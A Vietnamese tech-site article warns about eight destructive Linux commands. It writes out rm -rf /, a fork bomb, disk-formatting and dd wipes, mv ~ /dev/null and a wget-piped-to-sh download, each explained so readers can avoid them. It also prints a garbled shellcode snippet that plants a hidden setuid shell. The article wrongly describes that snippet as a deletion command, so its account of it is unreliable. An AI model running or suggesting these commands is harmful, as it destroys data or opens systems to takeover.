8 lệnh chết người nhất định không bao giờ được chạy trên Linux

Lệnh Terminal trên Linux có sức công phá khá mạnh, nếu bạn chạy một lệnh nào sẽ phá hủy hệ thống của bạn. Linux không yêu cầu bạn phải xác nhận khi chạy bất kỳ một lệnh nào.


Việc tìm hiểu các lệnh không nên chạy trên Linux giúp bảo vệ hệ thống của bạn khi làm việc trên Linux. Dưới đây là 8 lệnh chết người nhất định bạn không bao giờ được chạy trên Linux.



8 lệnh chết người nhất định không bao giờ được chạy trên Linux

1. rm -rf / - xóa tất cả mọi thứ


Lệnh rm -rf / sẽ xóa tất cả mọi thứ, kể cả các file trên ổ cứng và các file trên các thiết bị media kết nối với máy tính của bạn.


Để dễ hiểu hơn về câu lệnh này, bạn phân tích như sau:


Linux sẽ vui vẻ làm theo lệnh này và xóa mọi thứ mà không thông báo trước cho bạn, vì thế hãy cẩn thận khi sử dụng lệnh này.


Ngoài ra lệnh rm còn được sử dụng theo những cách rất nguy hiểm. Chẳng hạn, rm –rf ~ sẽ xóa mọi file trong Home Folder của bạn, còn rm -rf .* sẽ xóa tất cả các file cấu hình của bạn.


2. Lệnh trá hình rm –rf /


Dưới đây là một đoạn mã trên tất cả các Web:


char esp[] __attribute__ ((section('.text'))) /* e.s.p
release */
= 'xebx3ex5bx31xc0x50x54x5ax83xecx64x68'
'xffxffxffxffx68xdfxd0xdfxd9x68x8dx99'
'xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7'
'x56x04xf7x56x08xf7x56x0cx83xc4x74x56'
'x8dx73x08x56x53x54x59xb0x0bxcdx80x31'
'xc0x40xebxf9xe8xbdxffxffxffx2fx62x69'
'x6ex2fx73x68x00x2dx63x00'
'cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;';

Đây thực chất là một phiên bản khác của rm –rf / – thực thi lệnh này cũng sẽ xóa hết các file của bạn, như bạn chạy lệnh rm –rf /.


3. :(){ :|: & };: – Một dạng bom tấn




Dòng lệnh dưới đây nhìn có vẻ rất đơn giản nhưng thực chất chức năng của nó lại rất nguy hiểm:


:(){ :|: & };:

Dòng lệnh ngắn này sẽ tạo ra các bản sao mới của chính nó. Nghĩa là, quá trình sao lưu chính bản thân nó sẽ diễn ra liên tục và nhanh chóng khiến CPU và bộ nhớ của bạn bị đầy.


Ngoài ra nó có thể khiến máy tính của bạn bị đóng băng. Đó cơ bản là một vụ tấn công từ chối dịch vụ (DoS).


4. mkfs.ext4 /dev/sda1 – Formats ổ cứng


Lệnh mkfs.ext4 /dev/sda1 là câu lệnh khá dễ hiểu:


Khi kết hợp 2 lệnh này tương đương với format ổ C: trên Windows – xóa hết các file trên phân vùng đầu tiên của bạn và thay thế chúng bằng hệ thống file mới.


Lệnh này có thể xuất hiện ở nhiều định dạng khác nhau, như - mkfs.ext3 /dev/sdb2 sẽ format phân vùng thứ hai trên ổ cứng thứ 2 của bạn với hệ thống file ext3.


5. command > /dev/sda - viết trực tiếp lên một ổ cứng




Dòng command > /dev/sda - chạy một lệnh và gửi ra kết quả của lệnh đó trực tiếp lên ổ cứng đầu tiên của bạn, viết dữ liệu thẳng vào ổ cứng và phá hủy hệ thống file của bạn.


6. dd if=/dev/random of=/dev/sda – viết những dữ liệu ngớ ngẩn lên ổ cứng


Dòng dd if=/dev/random of=/dev/sda sẽ xóa dữ liệu trên một trong các ổ cứng của bạn.


7. mv ~ /dev/null – Di chuyển Home Directory của bạn đến một lỗ đen (Black Hole)


/dev/null - di chuyển cái gì đó đến /dev/null cũng tương tự như phá hủy nó. Hãy xem /dev/null là một lỗ đen. mv ~ /dev/null sẽ gửi hết tất cả các file cá nhân của bạn đến một lỗ đen.


8. wget http://example.com/something -O – | sh – tải và chạy một script


Dòng lệnh trên sẽ tải một script từ trên web và gửi script đến sh, và sẽ thực thi các nội dung trong script. Điều này có thể nguy hiểm nếu bạn không chắc script là gì hoặc bạn không có nguồn script tin cậy – không được chạy những script không đáng tin cậy.


wget – tải một file.


http://example.com/something – tải file từ vị trí này.


| – Dẫn (gửi) đầu ra của lệnh wget (file bản đã tải) trực tiếp đến một lệnh khác.


sh – gửi file đến lệnh sh.


Tham khảo thêm một số bài viết dưới đây:


Chúc các bạn vui vẻ! 

TIN LIÊN QUAN

Cách sử dụng lệnh Screen trong Linux

Bạn có một máy trạm kết nối với một máy chủ linux, tuy nhiên máy chạm thường xuyên bị ngắt đột ngột hoặc trục trặc mà bạn lại không biết làm sao để giữ chương trình của bạn được an toàn và có thể tiếp tục làm việc. Bằng bài viết dưới đây, TCN sẽ

Hướng dẫn thao tác với mạng cho người dùng Linux: 11 câu lệnh cần biết

Linux hỗ trợ các câu lệnh để tải file, chẩn đoán vấn đề về mạng, quản lý các giao diện mạng hay xem thống kê mạng trên terminal. Đây là một số câu lệnh Linux thông dụng để làm việc với mạng, mời các bạn tham khảo.

Cách kiểm tra tốc độ mạng Internet bằng lệnh cmd

Kiểm tra tốc độ mạng Internet sẽ giúp bạn biết tốc độ download, upload của mạng mình đang dùng có đúng với những gì nhà cung cấp mạng thông báo với bạn hay không. Sử dụng lệnh cmd này sẽ giúp bạn đo tốc độ mạng mà không cần dùng phần mềm.

Cách tạo một file ISO trên Linux

Có thể bạn biết rằng một tập tin ISO có thể được burn vào một đĩa CD / DVD hoặc ổ đĩa USB, nhưng liệu bạn có biết rằng bạn việc sao lưu hay lưu trữ các tập tin và thư mục của bạn thành một tập tin ISO sẽ tốt hơn? Với file ISO thì bạn có thể ghi nó

Cách cài đặt Python trên Windows, macOS, Linux

Để bắt đầu làm quen với Python, trước tiên bạn cần cài đặt Python trên máy tính đang dùng, có thể là Windows, macOS hoặc Linux. Dưới đây là hướng dẫn cài đặt Python trên máy tính, cụ thể cho từng hệ điều hành.

Cách đổi địa chỉ MAC trên Windows, Linux và MAC OS X

Một trong những lỗi không thể bắt được sóng WiFi là do địa chỉ MAC của card mạng máy tính không khớp với địa chỉ MAC của mạng WiFi chính chủ. Vì thế, bạn cần đổi địa chỉ MAC trên máy tính.

Hưỡng dẫn cài đặt TeamViewer 9 trên môi trường Linux

Tuy nhiên nhà cung cấp phần mềm miễn phí mục đích sử dụng cá nhân. TeamViewer có sẵn cho Windows, Linux, Mac OS, Android và iPhone. TeamViewer sử dụng ứng dụng WINE được tích hợp bên trong.

Cách tải phụ đề phim trên Linux

Những bộ phim kèm theo phụ đề giúp bạn hiểu rõ nội dung phim hơn. Tuy nhiên, không phải lúc nào tải phim bạn cũng có thể tải cả phụ đề. Vậy phải làm sao để xem được phụ đề phim trên Linux? Hôm nay, Quản Trị Mạng sẽ hướng dẫn bạn làm điều đó.

THỦ THUẬT HAY

Cách thêm khung hình Trung thu cho avatar Facebook

Tính năng khung hình Facebook mới đây đã cập nhật thêm khung hình Trung thu, để bạn có thể đổi avatar khung hình Trung thu trên Facebook.

Cách thay đổi độ phân giải màn hình trên Windows 10

Ví dụ như ở độ phân giải 800x600 pixel thì các icon và cửa sổ sẽ hiển thị to hơn, đem so với độ phân giải 1366x768 pixel thì bạn sẽ chứa được nhiều icon và các cửa sổ sẽ được hiển thị lớn hơn. Thông thường thì độ phân

Những dấu hiệu chứng tỏ bạn nên thay ổ cứng

Làm sao biết ổ cứng bị hỏng, dấu hiệu ổ cứng lỗi, bị bad? Nếu máy tính của bạn có những dấu hiệu dưới đây thì khả năng rất lớn là nó đã có vấn đề rồi, hãy chuẩn bị tinh thần để đem nó đi sửa hoặc thay ổ cứng mới thôi.

Thử ngay những cách gây chú ý trên Instagram

Hãy tìm hiểu những người bạn đang theo dõi trên Instagram. Nếu họ không phải bạn bè, người nổi tiếng hay tài khoản Instagram thực, bạn theo dõi họ vì thích ảnh phải không? Hãy đặt mình vào vị trí người theo dõi và chỉ

Hướng dẫn trải nghiệm chế độ Dark Mode chính gốc từ Google

Như TCN đã đưa tin, Google sắp cập nhật chế độ Dark Mode cho người dùng Windows 10. Một số sản phẩm hay dịch vụ của họ như YouTube cũng sẽ được cập nhật. Bây giờ chúng ta hãy cùng nhau trải nghiệm chế độ Dark Mode

ĐÁNH GIÁ NHANH

Đánh giá Bphone 3: Thiết kế đẹp, camera đủ dùng, khả năng tối ưu hóa phần mềm chưa tốt

Phải công nhận rằng, Bphone 3 sở hữu vẻ ngoài cuốn hút và có thể xem như 1 điểm nâng cấp đáng giá về thiết kế so với đàn anh đi trước. Mặt lưng của Bphone 3 được làm bằng kính bóng bẩy, kết hợp với phần khung nhôm bo

Giới công nghệ nước ngoài đánh giá camera Samsung Galaxy Note 8 xuất sắc đến đâu?

Galaxy Note 8 là chiếc smartphone đầu tiên của đại gia đình Samsung sở hữu hệ thống camera kép và cũng là thiết bị di động đầu tiên trên thế giới có khả năng chống rung quang học cho cả hai camera sau.

Đánh giá thiết kế HTC U12+: Đẹp, ấn tượng và rất khác biệt

HTC U12+ vẫn đi kèm hộp lớn hình vuông dạng dẹt quen thuộc từ thời HTC One M7 cách đây tới 5 năm. Phiên bản trong bài viết này sẽ là bản Xanh trong suốt, bản màu sắc độc nhất của HTC U12+. Bên trong hộp màu trắng, có